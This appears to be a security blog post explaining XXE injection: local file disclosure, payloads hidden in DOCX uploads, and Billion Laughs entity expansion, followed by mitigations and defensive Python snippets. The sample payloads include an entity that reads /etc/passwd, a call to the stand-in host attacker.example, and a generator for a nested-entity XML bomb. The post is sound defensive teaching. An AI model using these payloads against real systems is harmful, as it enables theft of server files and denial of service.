Web and mobile applications, word processors, web services, and content management platforms use the Extensible Markup Language (XML) to store and transport data between systems in a format that is both human-readable and machine-readable. If XML input is not properly validated, an application can be exposed to many attacks, such as SQL injection, cross-site scripting, server-side request forgery, local file read, denial of service, and (the hero of this post) XML External Entity (XXE) injection. This blog walks through different attack scenarios that use XXE injection.
WHAT IS AN XXE?
An XML External Entity (XXE) injection is a serious flaw that allows an attacker to read local files on the server, access internal networks, scan internal ports, or, in some configurations, execute commands on a remote server. It targets applications that parse XML.
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. The attacker takes advantage of this by embedding a malicious inline DOCTYPE definition in the XML data. When the web server processes the malicious XML input, the entities are expanded, which can give the attacker access to the web server’s file system or to remote file systems, or cause the server to establish connections to arbitrary hosts over HTTP/HTTPS.
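To make the shape of such a payload concrete, here is a small Python sketch that inspects a typical XXE document with the standard library's expat bindings and lists the external entities it declares, without resolving any of them. The sample document, the entity names, the `attacker.example` host, and the `external_entities` helper are all made up for illustration.

```python
from urllib.parse import urlparse
from xml.parsers import expat

# Illustrative payload only: entity names and the attacker.example host
# are assumptions made for this sketch.
SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY file SYSTEM "file:///etc/passwd">
  <!ENTITY ping SYSTEM "http://attacker.example/collect">
  <!ENTITY note "plain internal entity">
]>
<order><item>&file;</item><memo>&note;</memo></order>"""


def external_entities(xml_text):
    """Return (name, system_id, scheme) for each external entity declared."""
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # External entities carry a system identifier instead of a literal
        # value; internal entities (like "note") have no system identifier.
        if system_id is not None:
            found.append((name, system_id, urlparse(system_id).scheme))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # No external entity handler is installed, so nothing is fetched or read.
    parser.Parse(xml_text, True)
    return found


for name, target, scheme in external_entities(SAMPLE):
    print(f"{name}: {scheme} -> {target}")
```

The `file` scheme corresponds to reading from the server's own file system, while the `http` scheme corresponds to the server connecting out to another host. A weakly configured parser would follow both when it expands the entities.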
EXAMPLE ATTACK SCENARIOS
- Local File Hijack from Server
- Access Server files through a File Upload feature
- DoS attack with Recursive Entity Expansion
Attack Scenario 1 : Local File Hijack from Server
When the attacker sends a crafted XML payload in the request, the server processes the payload and sends back a response containing sensitive information, such as local files on the server, application configuration files, internal network details, and so on.
In a few cases, upon submitting the HTTP request with the crafted XXE payload, the server responded with the contents of its /etc/passwd file.
Snapshot 1 : HTTP Request with a malicious INLINE DOCTYPE definition – with the corresponding response
However, in many cases the server does not return the entity's content in its response. An attacker can still exploit the flaw by including a URL that points to an attacker-controlled server in the XXE payload. When the victim’s server parses the payload, it makes an additional call to the attacker-controlled server. By listening for that call, the attacker can capture information such as local files, server configuration files, and other server details.
The following images (Snapshots 2 and 3) show a URL included in the XXE payload. Upon submitting the HTTP request, the server makes an additional call to the attacker-controlled server. The attacker listens for the request from the victim system and captures the server details (/etc/passwd).
Snapshot 2 : HTTP Request containing the attacker-controlled URL
Snapshot 3 : Victim’s server makes an additional call to attacker’s server
Attack Scenario 2 : Access Server files through a File Upload feature
Many applications support a “File Upload” functionality (XLSX, DOCX, PPTX, SVG, or any other XML-based format) for further processing. These formats are either XML documents or archives of XML documents. An attacker could take advantage of the inherent XML type and upload malicious files embedded with XXE payloads. When the server parses the file, the XXE payload is processed, resulting in the disclosure of sensitive server information to the client.
Note that the libraries that parse XML in one part of the site (e.g. the API) may not be the same as the libraries that parse uploaded files.
Snapshot 4 : Embedding the XXE payload into the DOCX file. DOCX files (just like PPTX and XLSX) are essentially Open XML (OXML) files.
Snapshot 5 : Upload the malicious docx file to the (example) application
Snapshot 6 : Upon file submission, the server responds with sensitive server information (/etc/passwd)
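Seen from the defender's side, a DOCX is a ZIP archive of XML parts, so an upload handler could look inside it before handing it to a document library. The Python sketch below is a minimal illustration of that idea, not a complete defence. The function names, the in-memory sample archive, and the choice to treat any DOCTYPE as suspicious (legitimate Office documents generally have no need for one) are assumptions made for this example.

```python
import io
import zipfile
from xml.parsers import expat


class DoctypeFound(Exception):
    """Raised from the expat callback as soon as a DOCTYPE is seen."""


def _on_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeFound(name)


def suspicious_parts(archive_bytes):
    """Return the XML parts of a ZIP-based document that declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for part in archive.namelist():
            if not part.endswith((".xml", ".rels")):
                continue
            parser = expat.ParserCreate()
            parser.StartDoctypeDeclHandler = _on_doctype
            try:
                # Parsing stops at the DOCTYPE; no entity is ever expanded.
                parser.Parse(archive.read(part), True)
            except DoctypeFound:
                flagged.append(part)
    return flagged


def build_sample_archive():
    """Build a tiny DOCX-like archive in memory (hypothetical test data)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr(
            "word/document.xml",
            '<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            "<doc>&xxe;</doc>",
        )
    return buffer.getvalue()


print(suspicious_parts(build_sample_archive()))
```

A real handler would also need limits on archive and part sizes, and would have to decide how to treat parts that are not well-formed XML (here they raise `expat.ExpatError`).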
Attack Scenario 3 : DoS attack with Recursive Entity Expansion
This attack is also called the Billion Laughs attack, an XML bomb, or a Recursive Entity Expansion attack. It occurs when the parser keeps expanding entities that are defined in terms of other entities, which overloads the server and can bring it down.
From the snapshot below, we see that when the parser starts parsing the XML file, “&lol9;” is first resolved against the entity “lol9” to get its value, but “lol9” itself refers to the entity “lol8”, and so on. Each entity refers to ten copies of the entity below it, and each of those refers to ten more. As the parser expands the entities, memory and CPU utilisation grow exponentially with the nesting depth, causing the server to become unresponsive or crash.
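The arithmetic behind this is worth spelling out. The Python sketch below generates a document in the style of the Billion Laughs payload and computes how large the fully expanded result would be, without ever feeding it to a parser. The helper names and the default parameters (nine levels, ten references per level, the seed string "lol") are assumptions chosen to mirror the entity names mentioned above.

```python
def build_bomb(depth=9, fanout=10, seed="lol"):
    """Build a nested-entity document in the style of Billion Laughs."""
    decls = [f'  <!ENTITY lol "{seed}">']
    previous = "lol"
    for level in range(1, depth + 1):
        # Each level refers to `fanout` copies of the level below it.
        refs = f"&{previous};" * fanout
        decls.append(f'  <!ENTITY lol{level} "{refs}">')
        previous = f"lol{level}"
    body = "\n".join(decls)
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE lolz [\n{body}\n]>\n"
        f"<lolz>&{previous};</lolz>"
    )


def expanded_length(depth=9, fanout=10, seed="lol"):
    """Characters produced if the top-level entity is fully expanded."""
    return len(seed) * fanout ** depth


payload = build_bomb()
# The payload is only measured here, deliberately never parsed.
print(len(payload), "characters of XML")
print(expanded_length(), "characters after full expansion")
```

With the defaults, a document of under 1 KB would expand to 3 × 10^9 characters, which is why a parser that expands entities without limits can exhaust a server's resources from a single small request.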
XXE is not a new vulnerability, but it has gained more notoriety in recent applications. A successful XXE attack could result in massive damage on both the security and business functionality fronts. A few ways to deter XXE attacks include:
- Disable external entities. When they are required, allow only restricted and trusted external links.
- Turn off entity expansion in the XML parser.
- Double-check whether the versions of the XML libraries in use are vulnerable to XXE.
- Validate user-supplied input for external/internal entities and inline DOCTYPE definitions prior to parsing.
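The last item in the list, rejecting inline DOCTYPE definitions before parsing, can be sketched with Python's standard library. This is one possible approach under the assumption that the application never needs a DOCTYPE in the XML it accepts. The `safe_parse` helper and the `DoctypeForbidden` exception are names invented for this example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def safe_parse(xml_bytes):
    """Parse XML only after confirming that it declares no DOCTYPE."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    # Raises DoctypeForbidden at the DOCTYPE, before any entity is expanded,
    # or expat.ExpatError if the input is not well-formed.
    checker.Parse(xml_bytes, True)
    return ET.fromstring(xml_bytes)


clean = b"<order><item>book</item></order>"
hostile = (
    b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<order><item>&xxe;</item></order>"
)

print(safe_parse(clean).find("item").text)
try:
    safe_parse(hostile)
except DoctypeForbidden as error:
    print("rejected:", error)
```

Because entities can only be declared inside a DOCTYPE, refusing the DOCTYPE outright blocks both external entities and nested entity expansion in one step. Where a maintained hardening library is available for your parser, it is usually preferable to a hand-rolled check like this one.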